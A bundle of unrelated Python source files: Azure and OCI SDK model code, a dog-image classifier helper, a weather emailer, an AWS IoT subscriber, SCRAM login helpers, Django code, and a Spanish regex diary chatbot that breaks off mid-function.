PolicyEnabledState,
PolicyMode,
CustomRuleEnabledState,
RuleType,
MatchVariable,
Operator,
TransformType,
ActionType,
ManagedRuleExclusionMatchVariable,
ManagedRuleExclusionSelectorMatchOperator,
ManagedRuleEnabledState,
PolicyResourceState,
LatencyScorecardAggregationInterval,
TimeseriesAggregationInterval,
)
__all__ = [
'AzureAsyncOperationResult',
'Backend',
'BackendPool',
'BackendPoolListResult',
'BackendPoolsSettings',
'BackendPoolUpdateParameters',
'CacheConfiguration',
'CheckNameAvailabilityInput',
'CheckNameAvailabilityOutput',
'CustomHttpsConfiguration',
'CustomRule',
'CustomRuleList',
'Endpoint',
'Error',
'ErrorDetails',
'ErrorResponse', 'ErrorResponseException',
'Experiment',
'ExperimentUpdateModel',
'ForwardingConfiguration',
'FrontDoor',
'FrontDoorUpdateParameters',
'FrontendEndpoint',
'FrontendEndpointLink',
'FrontendEndpointUpdateParameters',
'FrontendEndpointUpdateParametersWebApplicationFirewallPolicyLink',
'HeaderAction',
'HealthProbeSettingsListResult',
'HealthProbeSettingsModel',
'HealthProbeSettingsUpdateParameters',
'KeyVaultCertificateSourceParametersVault',
'LatencyMetric',
'LatencyScorecard',
'LoadBalancingSettingsListResult',
'LoadBalancingSettingsModel',
'LoadBalancingSettingsUpdateParameters',
'ManagedRuleDefinition',
'ManagedRuleExclusion',
'ManagedRuleGroupDefinition',
'ManagedRuleGroupOverride',
'ManagedRuleOverride',
'ManagedRuleSet',
'ManagedRuleSetDefinition',
'ManagedRuleSetList',
'MatchCondition',
'PolicySettings',
'PreconfiguredEndpoint',
'Profile',
'ProfileUpdateModel',
'PurgeParameters',
'RedirectConfiguration',
'Resource',
'RouteConfiguration',
'RoutingRule',
'RoutingRuleLink',
'RoutingRuleListResult',
'RoutingRuleUpdateParameters',
'RoutingRuleUpdateParametersWebApplicationFirewallPolicyLink',
'RulesEngine',
'RulesEngineAction',
'RulesEngineMatchCondition',
'RulesEngineRule',
'RulesEngineUpdateParameters',
'SubResource',
'TagsObject',
'Timeseries',
'TimeseriesDataPoint',
'ValidateCustomDomainInput',
'ValidateCustomDomainOutput',
'WebApplicationFirewallPolicy',
'ProfilePaged',
'PreconfiguredEndpointPaged',
'ExperimentPaged',
'FrontDoorPaged',
'FrontendEndpointPaged',
'RulesEnginePaged',
'WebApplicationFirewallPolicyPaged',
'ManagedRuleSetDefinitionPaged',
'NetworkOperationStatus',
'NetworkExperimentResourceState',
'State',
'AggregationInterval',
'TimeseriesType',
'EndpointType',
'FrontDoorResourceState',
'CustomHttpsProvisioningState',
'CustomHttpsProvisioningSubstate',
'FrontDoorCertificateSource',
'MinimumTLSVersion',
'FrontDoorCertificateType',
'EnforceCertificateNameCheckEnabledState',
'FrontDoorEnabledState',
'FrontDoorProtocol',
'RoutingRuleEnabledState',
'FrontDoorForwardingProtocol',
'FrontDoorQuery',
'DynamicCompressionEnabled',
'FrontDoorRedirectType',
'FrontDoorRedirectProtocol',
'PrivateEndpointStatus',
'BackendEnabledState',
'FrontDoorHealthProbeMethod',
'HealthProbeEnabled',
'SessionAffinityEnabledState',
'HeaderActionType',
'RulesEngineMatchVariable',
'RulesEngineOperator',
'Transform',
'MatchProcessingBehavior',
'ResourceType',
'Availability',
'PolicyEnabledState',
'PolicyMode',
'CustomRuleEnabledState',
'RuleType',
'MatchVariable',
'Operator',
'TransformType',
'ActionType',
'ManagedRuleExclusionMatchVariable',
'ManagedRuleExclusionSelectorMatchOperator',
'ManagedRuleEnabledState',
'PolicyResourceState',
'LatencyScorecardAggregationInterval',
'TimeseriesAggregationInterval',
]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# */AIPND-revision/intropyproject-classify-pet-images/adjust_results4_isadog.py
#
# PROGRAMMER: Mohamed Gamal AbdElKhalek
# DATE CREATED: 2/5/2020
# REVISED DATE:
# PURPOSE: Create a function adjust_results4_isadog that adjusts the results
# dictionary to indicate whether or not the pet image label is of-a-dog,
# and to indicate whether or not the classifier image label is of-a-dog.
# All dog labels from both the pet images and the classifier function
# will be found in the dognames.txt file. We recommend reading all the
# dog names in dognames.txt into a dictionary where the 'key' is the
# dog name (from dognames.txt) and the 'value' is one. If a label is
# found to exist within this dictionary of dog names then the label
# is of-a-dog, otherwise the label isn't of a dog. Alternatively one
# could also read all the dog names into a list and then if the label
# is found to exist within this list - the label is of-a-dog, otherwise
# the label isn't of a dog.
# This function inputs:
# -The results dictionary as results_dic within adjust_results4_isadog
# function and results for the function call within main.
# -The text file with dog names as dogfile within adjust_results4_isadog
# function and in_arg.dogfile for the function call within main.
# This function uses the extend function to add items to the list
# that's the 'value' of the results dictionary. You will be adding
# whether or not the pet image label is of-a-dog as the item at index
# 3 of the list and whether or not the classifier label is of-a-dog as
# the item at index 4 of the list. Note we recommend setting the values
# at indices 3 & 4 to 1 when the label is of-a-dog and to 0 when the
# label isn't a dog.
#
##
# TODO 4: Define adjust_results4_isadog function below, specifically replace the None
# below by the function definition of the adjust_results4_isadog function.
# Notice that this function doesn't return anything because the
# results_dic dictionary that is passed into the function is a mutable
# data type so no return is needed.
#
def adjust_results4_isadog(results_dic, dogfile):
"""
Adjusts the results dictionary to determine if classifier correctly
classified images 'as a dog' or 'not a dog' especially when not a match.
Demonstrates if model architecture correctly classifies dog images even if
it gets dog breed wrong (not a match).
Parameters:
results_dic - Dictionary with 'key' as image filename and 'value' as a
List. Where the list will contain the following items:
index 0 = pet image label (string)
index 1 = classifier label (string)
index 2 = 1/0 (int) where 1 = match between pet image
and classifier labels and 0 = no match between labels
------ where index 3 & index 4 are added by this function -----
NEW - index 3 = 1/0 (int) where 1 = pet image 'is-a' dog and
0 = pet Image 'is-NOT-a' dog.
NEW - index 4 = 1/0 (int) where 1 = Classifier classifies image
'as-a' dog and 0 = Classifier classifies image
'as-NOT-a' dog.
dogfile - A text file that contains names of all dogs from the classifier
function and dog names from the pet image files. This file has
one dog name per line; dog names are all in lowercase with
spaces separating the distinct words of the dog name. Dog names
from the classifier function can be a string of dog names separated
by commas when a particular breed of dog has multiple dog names
associated with that breed (ex. maltese dog, maltese terrier,
maltese) (string - indicates text file's filename)
Returns:
None - results_dic is mutable data type so no return needed.
"""
dog_labels = []
# Reads in dognames from file, 1 name per line & automatically closes file
with open(dogfile, "r") as infile:
# Read the dog names, one per line
for dog_label in infile:
dog_labels.append(dog_label.lower().strip())
for filename in results_dic.keys():
# Index 3: 1 if the pet image label is a dog, 0 otherwise
results_dic[filename].append(int(results_dic[filename][0] in dog_labels))
# Index 4: 1 if the classifier label is a dog, 0 otherwise
results_dic[filename].append(int(results_dic[filename][1] in dog_labels))
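# A minimal sketch of the dictionary variant that the PURPOSE comment above
# recommends (the helper name read_dognames is hypothetical, not part of the
# project). Membership tests against a dict are O(1); for a small dognames.txt
# the list used above works just as well.
def read_dognames(dogfile):
    """Return a dict mapping each lowercased dog name from dogfile to 1."""
    dognames_dic = {}
    with open(dogfile, "r") as infile:
        for line in infile:
            name = line.lower().strip()
            if name and name not in dognames_dic:
                dognames_dic[name] = 1
    return dognames_dic
# Inside adjust_results4_isadog the membership checks would then read, e.g.:
#   results_dic[filename].append(int(results_dic[filename][0] in dognames_dic))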
|
import argparse
import os
import sys
from dotenv import load_dotenv
from sendgrid.helpers.mail import Mail
from requests.exceptions import RequestException
from bude_hezky.content import content_builder
from bude_hezky.sender import email_sender
from bude_hezky.weather import weather_forecast
CITY_OPTION_KEY = 'mesto'
EMAIL_OPTION_KEY = 'email'
SUNNY_LIKE_CODES = [1, 2, 3, 4, 5, 6, 20, 21, 30]
parser = argparse.ArgumentParser()
parser.add_argument(CITY_OPTION_KEY, help='Město, kde bydlíš a kód státu (např. Prague,CZ). Můžeš zkusit i vesnici.')
parser.add_argument(f'--{EMAIL_OPTION_KEY}', help='E-mail, na který pošleme informaci, zda bude hezky.')
cli_arguments = vars(parser.parse_args())
load_dotenv()
api_key = os.getenv('WEATHER_API_KEY')
city = cli_arguments[CITY_OPTION_KEY]
to_email = cli_arguments[EMAIL_OPTION_KEY]
try:
tomorrow_forecasts = weather_forecast.get_forecasts_for_city(api_key, city)
except RequestException as e:
print(f'Počasí nezjištěno kvůli chybě: {e}')
sys.exit(1)
sunny_hours = weather_forecast.get_sunny_like_hours(tomorrow_forecasts)
if not sunny_hours:
print(':( Zítra raději zůstaň doma.')
sys.exit()
hours_string = ', '.join(str(s) for s in content_builder.build_sunny_ranges(sunny_hours))
final_message = content_builder.rreplace(f'Hurá! Zítra bude ve městě {city} hezky mezi {hours_string}. Běž třeba na kolo!', ', ', ' a ', 1)
print(final_message)
if to_email:
print('Posílám e-mail...')
message = Mail(
from_email='ivan@ikvasnica.com',
to_emails=to_email,
subject='Zítra bude hezky',
html_content=final_message
)
try:
email_sender.send_mail(message)
except email_sender.EmailNotSentException as e:
print(f'E-mail nemohl být poslán kvůli chybě: {e}')
sys.exit(1)
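# Example .env file picked up by the load_dotenv() call above. The key name is
# taken from the os.getenv() call; the value is a placeholder:
#
#   WEATHER_API_KEY=your-weather-api-key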
|
# Surround data with 9s so we don't have to take special care of edges while identifying low points
# Since it's a 9, even low points on the actual edges remain low points.
with open("data.txt") as f:
data = [[9] + [int(e) for e in row] + [9] for row in [list(x[:-1]) for x in f.readlines()]]
data = [[9] * (len(data[0]) + 2)] + data
data = data + [[9] * (len(data[0]) + 2)]
# identify low points
low_points = []
for y, row in enumerate(data):
for x, element in enumerate(row):
try:
if data[y][x+1] > element and data[y][x-1] > element and data[y+1][x] > element and data[y-1][x] > element:
low_points.append(element)
except IndexError:  # edges are artificially added, so we can disregard them.
pass
print(f"Solution: {sum(low_points) + len(low_points)}.")
|
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from .ingress_gateway_traffic_route_rule import IngressGatewayTrafficRouteRule
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class HttpIngressGatewayTrafficRouteRule(IngressGatewayTrafficRouteRule):
"""
Rule for routing incoming ingress gateway traffic with HTTP protocol
"""
#: A constant which can be used with the path_type property of a HttpIngressGatewayTrafficRouteRule.
#: This constant has a value of "PREFIX"
PATH_TYPE_PREFIX = "PREFIX"
def __init__(self, **kwargs):
"""
Initializes a new HttpIngressGatewayTrafficRouteRule object with values from keyword arguments. The default value of the :py:attr:`~oci.service_mesh.models.HttpIngressGatewayTrafficRouteRule.type` attribute
of this class is ``HTTP`` and it should not be changed.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param type:
The value to assign to the type property of this HttpIngressGatewayTrafficRouteRule.
Allowed values for this property are: "HTTP", "TLS_PASSTHROUGH", "TCP", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type type: str
:param ingress_gateway_host:
The value to assign to the ingress_gateway_host property of this HttpIngressGatewayTrafficRouteRule.
:type ingress_gateway_host: oci.service_mesh.models.IngressGatewayHostRef
:param destinations:
The value to assign to the destinations property of this HttpIngressGatewayTrafficRouteRule.
:type destinations: list[oci.service_mesh.models.VirtualServiceTrafficRuleTarget]
:param path:
The value to assign to the path property of this HttpIngressGatewayTrafficRouteRule.
:type path: str
:param path_type:
The value to assign to the path_type property of this HttpIngressGatewayTrafficRouteRule.
Allowed values for this property are: "PREFIX", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type path_type: str
:param is_grpc:
The value to assign to the is_grpc property of this HttpIngressGatewayTrafficRouteRule.
:type is_grpc: bool
:param is_host_rewrite_enabled:
The value to assign to the is_host_rewrite_enabled property of this HttpIngressGatewayTrafficRouteRule.
:type is_host_rewrite_enabled: bool
:param is_path_rewrite_enabled:
The value to assign to the is_path_rewrite_enabled property of this HttpIngressGatewayTrafficRouteRule.
:type is_path_rewrite_enabled: bool
"""
self.swagger_types = {
'type': 'str',
'ingress_gateway_host': 'IngressGatewayHostRef',
'destinations': 'list[VirtualServiceTrafficRuleTarget]',
'path': 'str',
'path_type': 'str',
'is_grpc': 'bool',
'is_host_rewrite_enabled': 'bool',
'is_path_rewrite_enabled': 'bool'
}
self.attribute_map = {
'type': 'type',
'ingress_gateway_host': 'ingressGatewayHost',
'destinations': 'destinations',
'path': 'path',
'path_type': 'pathType',
'is_grpc': 'isGrpc',
'is_host_rewrite_enabled': 'isHostRewriteEnabled',
'is_path_rewrite_enabled': 'isPathRewriteEnabled'
}
self._type = None
self._ingress_gateway_host = None
self._destinations = None
self._path = None
self._path_type = None
self._is_grpc = None
self._is_host_rewrite_enabled = None
self._is_path_rewrite_enabled = None
self._type = 'HTTP'
@property
def path(self):
"""
Gets the path of this HttpIngressGatewayTrafficRouteRule.
Route to match
:return: The path of this HttpIngressGatewayTrafficRouteRule.
:rtype: str
"""
return self._path
@path.setter
def path(self, path):
"""
Sets the path of this HttpIngressGatewayTrafficRouteRule.
Route to match
:param path: The path of this HttpIngressGatewayTrafficRouteRule.
:type: str
"""
self._path = path
@property
def path_type(self):
"""
Gets the path_type of this HttpIngressGatewayTrafficRouteRule.
Match type for the route
Allowed values for this property are: "PREFIX", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The path_type of this HttpIngressGatewayTrafficRouteRule.
:rtype: str
"""
return self._path_type
@path_type.setter
def path_type(self, path_type):
"""
Sets the path_type of this HttpIngressGatewayTrafficRouteRule.
Match type for the route
:param path_type: The path_type of this HttpIngressGatewayTrafficRouteRule.
:type: str
"""
allowed_values = ["PREFIX"]
if not value_allowed_none_or_none_sentinel(path_type, allowed_values):
path_type = 'UNKNOWN_ENUM_VALUE'
self._path_type = path_type
@property
def is_grpc(self):
"""
Gets the is_grpc of this HttpIngressGatewayTrafficRouteRule.
If true, the rule will check that the content-type header has an application/grpc
or one of the various application/grpc+ values.
:return: The is_grpc of this HttpIngressGatewayTrafficRouteRule.
:rtype: bool
"""
return self._is_grpc
@is_grpc.setter
def is_grpc(self, is_grpc):
"""
Sets the is_grpc of this HttpIngressGatewayTrafficRouteRule.
If true, the rule will check that the content-type header has an application/grpc
or one of the various application/grpc+ values.
:param is_grpc: The is_grpc of this HttpIngressGatewayTrafficRouteRule.
:type: bool
"""
self._is_grpc = is_grpc
@property
def is_host_rewrite_enabled(self):
"""
Gets the is_host_rewrite_enabled of this HttpIngressGatewayTrafficRouteRule.
If true, the hostname will be rewritten to the target virtual deployment's DNS hostname.
:return: The is_host_rewrite_enabled of this HttpIngressGatewayTrafficRouteRule.
:rtype: bool
"""
return self._is_host_rewrite_enabled
@is_host_rewrite_enabled.setter
def is_host_rewrite_enabled(self, is_host_rewrite_enabled):
"""
Sets the is_host_rewrite_enabled of this HttpIngressGatewayTrafficRouteRule.
If true, the hostname will be rewritten to the target virtual deployment's DNS hostname.
:param is_host_rewrite_enabled: The is_host_rewrite_enabled of this HttpIngressGatewayTrafficRouteRule.
:type: bool
"""
self._is_host_rewrite_enabled = is_host_rewrite_enabled
@property
def is_path_rewrite_enabled(self):
"""
Gets the is_path_rewrite_enabled of this HttpIngressGatewayTrafficRouteRule.
If true, the matched path prefix will be rewritten to '/' before being directed to the target virtual deployment.
:return: The is_path_rewrite_enabled of this HttpIngressGatewayTrafficRouteRule.
:rtype: bool
"""
return self._is_path_rewrite_enabled
@is_path_rewrite_enabled.setter
def is_path_rewrite_enabled(self, is_path_rewrite_enabled):
"""
Sets the is_path_rewrite_enabled of this HttpIngressGatewayTrafficRouteRule.
If true, the matched path prefix will be rewritten to '/' before being directed to the target virtual deployment.
:param is_path_rewrite_enabled: The is_path_rewrite_enabled of this HttpIngressGatewayTrafficRouteRule.
:type: bool
"""
self._is_path_rewrite_enabled = is_path_rewrite_enabled
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
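# A minimal construction sketch (values are illustrative only). Per the __init__
# docstring above, fields are supplied as keyword arguments and anything omitted
# stays None; the import path comes from the docstring as well:
#
#   from oci.service_mesh.models import HttpIngressGatewayTrafficRouteRule
#   rule = HttpIngressGatewayTrafficRouteRule(
#       path='/api',
#       path_type='PREFIX',
#       is_grpc=False,
#       is_path_rewrite_enabled=True,
#       destinations=[],
#   )
#   print(rule)  # __repr__ renders the populated fields via formatted_flat_dict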
|
# -*- coding: utf-8 -*-
from rest_framework import serializers
from .models import Country, Event
class CountrySerializer(serializers.ModelSerializer):
class Meta:
model = Country
fields = ["id", "name", "url"]
class EventSerializer(serializers.ModelSerializer):
latitude = serializers.DecimalField(max_digits=8, decimal_places=6,
min_value=-90, max_value=90)
longitude = serializers.DecimalField(max_digits=9, decimal_places=6,
min_value=-180, max_value=180)
class Meta:
model = Event
fields = [
"id", "country", "name", "slug",
"is_juniors", "is_restricted", "is_discontinued",
"latitude", "longitude"
]
|
'''
/*
* Copyright 2010-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
'''
import time, json
from os import path, environ, name
from AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient
# Custom MQTT message callback
def customCallback(client, userdata, message):
print("--start--")
shadow_state = json.loads(message.payload)
for value in shadow_state['state']['reported']:
for element in shadow_state['state']['reported'][value]:
print(element['timedate'][:-4], element['msg'])
print("--end--")
# Get path to client-files
if name == 'nt':
path_iot = path.join(environ['localappdata'], "LTS AS", "iot")
else:
path_iot = environ['HOME'] + "/config/iot/"  # HOME rather than HOMEPATH on non-Windows systems
with open(path.join(path_iot, 'conf.json'), "r") as f:
config = json.loads(f.read())
host = config['host']
rootCAPath = path.join(path_iot, 'root-CA.crt')
certificatePath = path.join(path_iot, 'certificate.pem.crt')
privateKeyPath = path.join(path_iot, 'private.pem.key')
client_id = config['client_id']
# Init AWSIoTMQTTClient
myAWSIoTMQTTClient = AWSIoTMQTTClient(client_id)
myAWSIoTMQTTClient.configureEndpoint(host, 8883)
myAWSIoTMQTTClient.configureCredentials(rootCAPath, privateKeyPath, certificatePath)
# AWSIoTMQTTClient connection configuration
myAWSIoTMQTTClient.configureAutoReconnectBackoffTime(1, 32, 20)
myAWSIoTMQTTClient.configureOfflinePublishQueueing(-1) # Infinite offline Publish queueing
myAWSIoTMQTTClient.configureDrainingFrequency(2) # Draining: 2 Hz
myAWSIoTMQTTClient.configureConnectDisconnectTimeout(10) # 10 sec
myAWSIoTMQTTClient.configureMQTTOperationTimeout(5) # 5 sec
# Connect and subscribe to AWS IoT
myAWSIoTMQTTClient.connect()
myAWSIoTMQTTClient.subscribe('$aws/things/no-lts-ws1/shadow/get/accepted', 1, customCallback)
# Publish an empty get request once, then wait briefly for the callback to fire
myAWSIoTMQTTClient.publish('$aws/things/no-lts-ws1/shadow/get', None, 1)
time.sleep(5)
|
import uuid
import hashlib
import hmac
from binascii import hexlify
import math
import base64
from Crypto.Cipher import PKCS1_v1_5
from Crypto.PublicKey.RSA import construct
def generate_nonce():
""" generate random clientside nonce """
return uuid.uuid4().hex + uuid.uuid4().hex
def get_client_proof(clientnonce, servernonce, password, salt, iterations):
""" calculates server client proof (part of the SCRAM algorithm) """
msg = "%s,%s,%s" % (clientnonce, servernonce, servernonce)
salted_pass = hashlib.pbkdf2_hmac(
'sha256', password, bytearray.fromhex(salt), iterations)
client_key = hmac.new(b'Client Key', msg=salted_pass,
digestmod=hashlib.sha256)
stored_key = hashlib.sha256()
stored_key.update(client_key.digest())
signature = hmac.new(msg.encode('utf_8'),
msg=stored_key.digest(), digestmod=hashlib.sha256)
# XOR the two digests byte by byte; wrapping them in bytearray() works on
# both Python 2 (str digests) and Python 3 (bytes digests).
client_key_digest = bytearray(client_key.digest())
signature_digest = bytearray(signature.digest())
client_proof = bytearray(ck ^ sig for ck, sig in zip(client_key_digest, signature_digest))
return hexlify(client_proof)
def rsa_encrypt(rsae, rsan, data):
    """ encrypts data with the server's RSA public key (hex exponent/modulus) """
    if data is None or data == '':
        return ''
    N = int(rsan, 16)
    E = int(rsae, 16)
    if isinstance(data, str):
        data = data.encode('utf-8')
    b64data = base64.b64encode(data)
    pubkey = construct((N, E))
    cipher = PKCS1_v1_5.new(pubkey)
    # 245 bytes is the PKCS#1 v1.5 payload limit for a 2048-bit modulus
    # (256 bytes minus 11 bytes of padding)
    blocks = int(math.ceil(len(b64data) / 245.0))
    result = []
    for i in range(blocks):
        block = b64data[i * 245:(i + 1) * 245]
        result.append(cipher.encrypt(block))
    result = hexlify(b''.join(result))
    if (len(result) & 1) == 0:
        return result
    return b'0' + result
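# A small usage sketch of the SCRAM helpers above. Everything except the client
# nonce is a placeholder: in the real exchange the server supplies the combined
# nonce, the salt (hex encoded) and the iteration count.
if __name__ == '__main__':
    client_nonce = generate_nonce()
    server_nonce = client_nonce + 'f' * 64   # placeholder for the server's nonce part
    salt = '00' * 16                         # placeholder 16-byte salt, hex encoded
    iterations = 100                         # placeholder iteration count
    proof = get_client_proof(client_nonce, server_nonce, b'correct-horse', salt, iterations)
    print(proof)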
|
# Generated by Django 3.1.7 on 2021-10-27 17:39
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('donations', '0016_auto_20210522_1336'),
]
operations = [
migrations.CreateModel(
name='Donor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=250)),
('pseudonym', models.TextField(blank=True)),
('email', models.EmailField(max_length=254)),
('address', models.TextField(blank=True)),
('zip_code', models.CharField(blank=True, max_length=5)),
('city', models.CharField(blank=True, max_length=50)),
('country', models.TextField(blank=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
migrations.AddField(
model_name='donation',
name='donor',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='donations.donor'),
),
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import random
import sys
import unicodedata
import my_conexion
# stdout is expected to use UTF-8 so the accented bot responses print correctly
# PROCESS THE USER'S MESSAGE
def generarRespuesta(mensaje, STATES, username):
message_=sinAcentos(mensaje)
ans=''
vez = STATES['vez']
print(message_)
SALUDO = re.compile('^(h|H)ola|HOLA|(Q|q)u(e|é)\stal|QU(É|E)\sTAL|((B|b)uenas)|BUENAS|(Q|q)u(e|é)\sonda|QU(E|É)\sONDA|(H|h)ello|HELLO|(H|h)i|HI|(Q|q)iubo|QUIUBO|(S|s)aludos|SALUDOS|(B|b)uenos\sd(i|í)as|BUENOS\sD(I|Í)AS($|.*)');
SALUDO_MATCH = re.match(SALUDO,message_)
if SALUDO_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nHola, soy DiarioBot, me encantaria platicar contigo..."
if ev == 2:
ans =ans + "\nHola, yo soy tu diario personal..."
if ev == 3:
ans =ans + "\nHola, vamos a platicar..."
SENTIMIENTO = re.compile('(.*|^)((E|e)stoy|(M|m)e\s(fue|(S|s)iento)|puse|sent(i|í))(.*|(M|m)uy)\s((F|f)el(i\í)z|(C|c)ontent(o|a)|(A|a)legre|(B|b)ien)($|.*)');
SENTIMIENTO_MATCH = re.match(SENTIMIENTO,message_)
if SENTIMIENTO_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nMe alegra que te sientas así, espero todos los días te sientas de esa manera, ¿Que más pasó?..."
if ev == 2:
ans =ans + "\nQue bueno que estes así, ¿Que mas pasó?..."
if ev == 3:
ans =ans + "\nMuy bien, que siempre sea así, ¿Que mas pasó?..."
SENTIMIENTO_1 = re.compile('(.*|^)((E|e)stoy|(M|m)e\s(fue|(S|s)iento)|puse|sent(i|í))(.*|(M|m)uy)\s((T|t)riste|(M|m)al|(I|i)nfel(i|í)z|(D|d)ecaid(o|a))($|.*)');
SENTIMIENTO_MATCH = re.match(SENTIMIENTO_1,message_)
if SENTIMIENTO_MATCH:
ev = random.randint(1, 3)
if ev == 1:
ans =ans + "\nNo me gusta que te sientas asi animo, Cuenta me más..."
if ev == 2:
ans =ans + "\nQue mal en serio, Cuenta me más..."
if ev == 3:
ans =ans + "\nNo te preocupes, se que estaras mejor mañana, Cuenta me más..."
NO_MAMA = re.compile('(.*|^)(fallecio|murio|no\stengo)(|\smi)\smam(a|á)($|.*)');
NO_MATCH = re.match(NO_MAMA,message_)
if NO_MATCH:
my_conexion.cambiar_estado('mama',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['mama'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['mama'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_MAMA = re.compile('(.*|^)mi\smam(a|á)\s(fallecio|murio)($|.*)');
NO_MATCH = re.match(NO_MAMA,message_)
if NO_MATCH:
my_conexion.cambiar_estado('mama',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['mama'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['mama'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_PAPA = re.compile('(.*|^)(falleci(o|ó)|muri(o|ó)|no\stengo)(|\smi)\spap(a|á)($|.*)');
NO_MATCH = re.match(NO_PAPA,message_)
if NO_MATCH:
my_conexion.cambiar_estado('papa',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['papa'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['papa'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_PAPA = re.compile('(.*|^)mi\spap(a|á)\s(fallecio|murio)($|.*)');
NO_MATCH = re.match(NO_PAPA,message_)
if NO_MATCH:
my_conexion.cambiar_estado('papa',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['papa'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['papa'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_HERMA = re.compile('(.*|^)(fallecio|murio|no\stengo)(|\smi)\sherman(o|a)($|.*)');
NO_MATCH = re.match(NO_HERMA,message_)
if NO_MATCH:
my_conexion.cambiar_estado('hermano',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['hermano'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['hermano'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_HERMA = re.compile('(.*|^)mi\sherman(o|a)\s(fallecio|murio)($|.*)');
NO_MATCH = re.match(NO_HERMA,message_)
if NO_MATCH:
my_conexion.cambiar_estado('hermano',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['hermano'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['hermano'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_MAS = re.compile('(.*|^)(fallecio|murio|no\stengo)(|\smi)\s(mascota|perro|gato|pajaro|pez|rana|tortuga|iguana)($|.*)');
NO_MATCH = re.match(NO_MAS,message_)
if NO_MATCH:
my_conexion.cambiar_estado('mascota',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['mascota'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['mascota'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_MAS = re.compile('(.*|^)mi\s(mascota|perro|gato|pajaro|pez|rana|tortuga|iguana)\s(fallecio|murio)($|.*)');
NO_MATCH = re.match(NO_MAS,message_)
if NO_MATCH:
my_conexion.cambiar_estado('mascota',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['mascota'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['mascota'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_AMI = re.compile('(.*|^)(fallecio|murio|no\stengo)(|\smi)\smejor amig(o|a)($|.*)');
NO_MATCH = re.match(NO_AMI,message_)
if NO_MATCH:
my_conexion.cambiar_estado('amigo',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['amigo'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['amigo'] = True
ans =ans + "\nQue fuerte, lo siento ¿Quieres seguir platicando?..."
NO_AMI = re.compile('(.*|^)mi\smejor amig(o|a)\s(fallecio|murio)($|.*)');
NO_MATCH = re.match(NO_AMI,message_)
if NO_MATCH:
my_conexion.cambiar_estado('amigo',username)
ev = random.randint(1, 2)
if ev == 1:
STATES['amigo'] = True
ans =ans + "\nLo siento mucho, se que es algo demaciado doloroso, ¿Quieres seguir platicando?..."
if ev == 2:
STATES['amigo'] = True
